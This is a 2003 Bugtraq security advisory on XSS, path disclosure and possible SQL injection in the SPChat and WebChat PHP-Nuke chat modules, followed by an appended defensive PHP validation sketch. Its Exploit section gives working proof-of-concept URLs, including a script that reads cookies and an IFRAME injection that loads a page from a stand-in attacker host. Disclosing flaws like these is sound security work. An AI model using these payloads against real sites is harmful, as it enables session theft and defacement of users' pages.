Message-ID: <17057.1054420151@www61.gmx.net>
Date: Sun, 1 Jun 2003 00:29:11 +0200 (MEST)
From: Rynho Zeros Web <hackargentino@....net>
To: bugtraq@...urityfocus.com
Subject: [ PHP-Nuke :] Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Topic: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Systems Affected: Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0
      Vendor URL: http://www.saarport.net
       Vuln Type: XSS (Cross Site Scripting), Path Disclosure, disclosure of
DB user name, possible SQL injection
          Status: Vendor contacted; a patched version will be available shortly.
(http://www.saarport.net/modules.php?name=Forums&file=viewtopic&p=1029)
          Author: XyborG (http://www.rzw.com.ar)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Intro:
~~~~~~
SPChat & WebChat are very good and stable online chat systems.  But they
have their faults :)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note:  The name of the WebChat module can vary; I will use that name.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:
~~~~~~~~~

The vendor has been contacted and a patched version will be available shortly.
As a temporary fix, you must remove this script from your web site, or
rename it so that nobody has access, but check the author's web site
for the new patch, to be able to continue using this service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
~~~~~~~~

Web Chat 2.0 for PHP-Nuke:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclosure (see the source code):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules/WebChat/out.php

----- Source Code -----

<br />
<b>Warning</b>:  Access denied for user: 'victim@...alhost' (Using password:
YES) in
<b>/home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php</b> on line <b>33</b><br />
</TD></TR></TABLE><B>Database error:</B> Link_ID == false, connect
failed<BR>
<B>MySQL error</B>: 0 ()<BR>
Session halted.

----- Source Code -----

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclosure:
~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Path Disclosure & disclosure of DB user name & XSS, SQL Injection?:
http://www.victim.com/modules/WebChat/in.php
http://www.victim.com/modules/WebChat/quit.php
http://www.victim.com/modules/WebChat/users.php
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code]
http://www.victim.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username="><script>alert(document.cookie);</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SPChat Ver. 0.8.0:
~~~~~~~~~~~~~~~~~~
http://www.victim.com/modules.php?op=modload&name=SPChat&file=index&statussess=<IFRAME%20src="http://www.attacker.com.ar/attack.htm"%20marginWidth=0%20marginHeight=0%20frameBorder=0%20width=500%20scrolling=yes%20height=500></IFRAME>

----- Source Code For attack.htm for eg. -----
?script>
alert(document.cookie);
?/script>
----- Source Code For attack.htm -----

(Note:  Replace '?'  by '<')

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-- 
XyBØrG
Webmaster of:
www.RZWEB.com.ar
Powered By Dattatec.Com
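
A defensive sketch of the input handling these findings call for, as an added example that is not part of the original post and not the vendor's patch. The helper names (chat_int_param, chat_html, chat_fail) are hypothetical, and it assumes room and user ids are non-negative integers.

```php
<?php
// Added illustration, not SPChat/WebChat source. Function names are hypothetical.

// 1. Never render PHP warnings to the client: they carry the script path and
//    the DB user name, as in the out.php output quoted in the advisory.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// 2. Numeric parameters (roomid, rid, uid): accept decimal digits only.
//    Assumption: ids are non-negative integers of at most 9 digits.
function chat_int_param(array $src, string $name): ?int
{
    $raw = $src[$name] ?? null;
    if (!is_string($raw) || $raw === '' || strlen($raw) > 9 || !ctype_digit($raw)) {
        return null; // rejects "Non_Numeric", "-1", arrays and empty values
    }
    return (int) $raw;
}

// 3. Free-text parameters (username, statussess): encode at output time so
//    quotes and angle brackets cannot close an attribute or open a tag.
function chat_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 4. Fail closed with a generic message; details go to the server log only.
function chat_fail(string $logDetail): void
{
    error_log('chat: ' . $logDetail);
    http_response_code(400);
    echo 'Bad request.';
}

// Constructed sample input mirroring the users.php request in the advisory.
$query = [
    'rid'      => 'Non_Numeric',
    'uid'      => '-1',
    'username' => '"><script>alert(document.cookie);</script>',
];

$rid = chat_int_param($query, 'rid');
$uid = chat_int_param($query, 'uid');
if ($rid === null || $uid === null) {
    chat_fail('rejected non-numeric rid/uid');
} else {
    echo 'User: ' . chat_html($query['username'] ?? '');
}
```

Ids validated this way should still reach the database through parameterized queries rather than string concatenation.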
